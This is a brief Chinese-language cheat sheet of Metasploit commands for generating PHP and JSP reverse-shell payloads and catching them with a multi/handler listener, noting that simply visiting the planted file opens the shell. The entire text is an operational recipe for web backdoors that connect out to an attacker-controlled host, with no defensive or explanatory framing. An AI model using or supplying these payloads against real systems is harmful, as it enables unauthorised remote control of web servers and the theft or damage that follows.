跳转至

Msf生成反弹马

php

msf > msfpayload php/reverse_php LHOST=x.x.x.x LPORT=2333 R > re.php
生成反弹shell
msf > use multi/handler
msf exploit(handler) > set PAYLOAD php/reverse_php
msf exploit(handler) > set LHOST x.x.x.x
msf exploit(handler) > set LPORT 2333
msf exploit(handler) > exploit

访问即可反弹

jsp

msf >msfpayload java/jsp_shell_reverse_tcp LHOST=x.x.x.x R > re.jsp
生成反弹shell
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.1
msf exploit(handler) > exploit

访问即可反弹